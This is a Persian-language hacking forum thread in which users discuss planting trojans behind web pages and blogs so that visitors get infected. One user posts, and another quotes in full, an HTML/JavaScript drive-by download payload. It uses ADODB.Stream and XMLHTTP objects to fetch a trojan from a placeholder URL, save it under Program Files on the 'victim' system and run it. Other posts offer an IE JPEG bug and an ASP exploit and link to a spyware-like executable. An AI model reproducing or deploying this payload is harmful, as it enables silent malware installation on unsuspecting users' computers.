حالت موضوعی | حالت خطی

**arnh**

توی این پست کسی به نام بهزاد داریم.
اگه هست .
ببین این به کارت می خوره
http://www.2-spyware.com/file-mastoer32-dll.html
اگه به کارت می خوره تا راه انتشارش رو بگم . از طریق html
بای.
در ضمن چرا توی وبلاگ کامنت گذاشتی ؟؟
پیغام خصوصی می دادی !!

rRezar

سلام
شرمنده يه سوتي برنامه نويسي بود که حل شد
قضيه اين بود که برنامه بايد فايل سرور رو توسط فايل کمپرسور فشرده کنه
ولي اين برنامه هر دو دفعه فايل سرور رو کپي مي کرد
(اگه توجه کني هردوتا فايل يکيه)

حالا چرا ناراحت شدي
من هيچوقت نميام با يه تروجان به جون ملت بيفتم وقتي کسي رو نميشناسم اطلاعاتش به چه درد من مي خوره؟!!!

ثانيا من نميام يه فايل ويروسو عمدا تو يه سايت برنامه نويسي بزارم
که خودمو خراب کنم

اگه هنوزم شک داري ميتونم سورسشو بهت بدم
يا خودت اسمبليشو بخون
بازم شرمندتم

برنامه رو هم درستش کردم:
http://www.crazyangel.persiangig.com/document/DBSpy.exe

rRezar

برنامه ي تبديل به HTML هم تو وبلاگ هست
اينه:

impostor

ما که حرفی نداريم
خوبه که مشکل حل شد.

lolohacko

برنامه های تبدیل کننده فایل اجرایی به اسکریپت که از طریق اینترنت اکسپلورر اجرا بشه دیگه جواب نمیدن فقط برای IE 5.5 به پایین جواب میده.

تنها راهش استفاده از اکسپلویت هست یا نصب Activex که البته راه دوم توی XP SP2 یه کم سخت چون به صورت پیش فرض بلاگ شده البته راههایی هم هست که بشه ویندوز رو کلک زد مثلا کاری کنی که ویندوز فکر کنه میخوای فلش پلیر نصب بشه.

rRezar

من يه فايل ASP داشتم که حتي تو سرويس پک دو هم بدون هيچ اخطاري کار مي کرد.
بايد بگردم چون يه بار هاردمو کلا فورمت کردم و بازيابي کردم
پيداش کردم حتما واست ميزارمش

يه راه ديگه هم هست که الان بعضي آنتي ويروس ها مثل NOD32 مي فهمن
اونم اينه که از باگ JPEG استفاده کني و فايلتو تبديل به عکس کني

ولي فقط باگش تو اينترنت اکسپلورر کار مي کنه

sheveda

چه جالب ادم چه چیزایی که نمیشنوه؟
منم ممنون میشم بزاریدش Tongue

rRezar

باگ JPEG رو كسي ميخواد؟

sheveda

همون asp که رو سرویس پکه 2 هم جواب میده و اگه میشه همین باگه jpeg

cooper

می تونی از یه اکتیو ایکس استفاده کنی
اون یه فایل html هستش که وقتی اونو اجرا میکنی فیلی که بهش آدرس دادی رو رو سیستم قربانی دانلود میکنه  و بعد هم اجرا میکنه
------------------------------------------------------------
اینو تو یه نت پد بنویس بعد به سورت html سیو کن
فقط به جای your trojan آدرس تروجان خودت رو بده
مشکلی در این مورد داشتی بگو تا بگم

انیم سورس html :

---------------------------------------------------------------
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","your trojan",0);
x.Send(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\YPagr.exe",2);
</textarea>

<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
"classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/Program Files/YPagr.exe\"></object>";
w=createPopup();
w.document.clear(); w.document.write(md);
</textarea>

<script language="javascirpt">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/"/g,"\\\"");
            line = line.replace(/[/]/g,"%2f");

            line = line.replace(/\r\n/,"");
            line += ' ';

            if (line != '') {
                result += line;
            }
        }
        return result;
    }
    function weiter() {
        open(myURL,"_search");
    }

    function starten(thecode) {
        mycode = preparecode(thecode);
        myURL = "file:javascirpt:eval('" + mycode + "')";
        open("http:///","_search");
        setTimeout("weiter()", 500);

    }

    function doit() {
    starten(document.all.code.value);
    setTimeout("doit2()", 600);
    }

    function doit2() {
    starten(document.all.code2.value);

    }
    setTimeout("doit()", 500);
</script>

----------------------------------------------------------
حالا هر کی این html رو اجرا کنه فایل شما رو سیستمش دانلود میشه
بدون اینکه ...

mr_president

cooper نوشته است:می تونی از یه اکتیو ایکس استفاده کنی
اون یه فایل html هستش که وقتی اونو اجرا میکنی فیلی که بهش آدرس دادی رو رو سیستم قربانی دانلود میکنه  و بعد هم اجرا میکنه
------------------------------------------------------------
اینو تو یه نت پد بنویس بعد به سورت html سیو کن
فقط به جای your trojan آدرس تروجان خودت رو بده
مشکلی در این مورد داشتی بگو تا بگم

انیم سورس html :

---------------------------------------------------------------
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","your trojan",0);
x.Send(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\YPagr.exe",2);
</textarea>

<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
"classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/Program Files/YPagr.exe\"></object>";
w=createPopup();
w.document.clear(); w.document.write(md);
</textarea>

<script language="javascirpt">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/"/g,"\\\"");
            line = line.replace(/[/]/g,"%2f");

            line = line.replace(/\r\n/,"");
            line += ' ';

            if (line != '') {
                result += line;
            }
        }
        return result;
    }
    function weiter() {
        open(myURL,"_search");
    }

    function starten(thecode) {
        mycode = preparecode(thecode);
        myURL = "file:javascirpt:eval('" + mycode + "')";
        open("http:///","_search");
        setTimeout("weiter()", 500);

    }

    function doit() {
    starten(document.all.code.value);
    setTimeout("doit2()", 600);
    }

    function doit2() {
    starten(document.all.code2.value);

    }
    setTimeout("doit()", 500);
</script>

----------------------------------------------------------
حالا هر کی این html رو اجرا کنه فایل شما رو سیستمش دانلود میشه
بدون اینکه ...

عزيز اين كه همون shame soft بود

موضوعات مرتبط با این موضوع...
موضوع		نویسنده	پاسخ	بازدید	آخرین ارسال
	هک با تروجان	behnezhad	9	9,894	۰۹-بهمن-۱۳۸۶, ۰۹:۴۹:۳۱ آخرین ارسال: avini
	گذاشتن تروجان پشت وبلاگ(exe2html)	koroshbozorg	3	6,062	۲۹-آبان-۱۳۸۶, ۱۶:۳۳:۱۵ آخرین ارسال: koroshbozorg
	از كار انداختن كي لاگر .و يا تروجان	ekrami	18	14,372	۲۶-آبان-۱۳۸۶, ۱۷:۱۷:۵۳ آخرین ارسال: Payman62
	سورس ارسال pm در تروجان براي ياهو مسنجر 8	ekrami	1	3,598	۲۳-مهر-۱۳۸۶, ۱۸:۱۷:۰۳ آخرین ارسال: sima_6600
	يه تروجان بايد چه كارايي انجام بد	ashkan	17	13,621	۱۵-مرداد-۱۳۸۶, ۰۱:۲۸:۲۴ آخرین ارسال: Payman62
	IMPOSTOR 1.0 يک تروجان همه کاره!	impostor	6	6,788	۰۶-دى-۱۳۸۵, ۰۹:۵۸:۵۷ آخرین ارسال: veyskarami
	من در مورد نوشتن يه تروجان كمك مي	mandana_javidan	9	8,166	۰۴-دى-۱۳۸۵, ۰۴:۵۶:۴۷ آخرین ارسال: CRazYFULL
	معرفي تروجان قوي	hhhhaaaakkkk	1	3,825	۲۸-آذر-۱۳۸۵, ۰۲:۲۷:۲۴ آخرین ارسال: amin_vb
	تروجان	hhhhaaaakkkk	0	2,004	۲۷-آذر-۱۳۸۵, ۱۷:۴۹:۴۷ آخرین ارسال: hhhhaaaakkkk
	تروجان يا كي لاگر خفن	peymantrojan	3	4,070	۲۹-آبان-۱۳۸۵, ۲۱:۲۵:۴۸ آخرین ارسال: demon-child

حالت موضوعی \| حالت خطی help آپلود تروجان روي صفحهي وب
نویسنده	پیام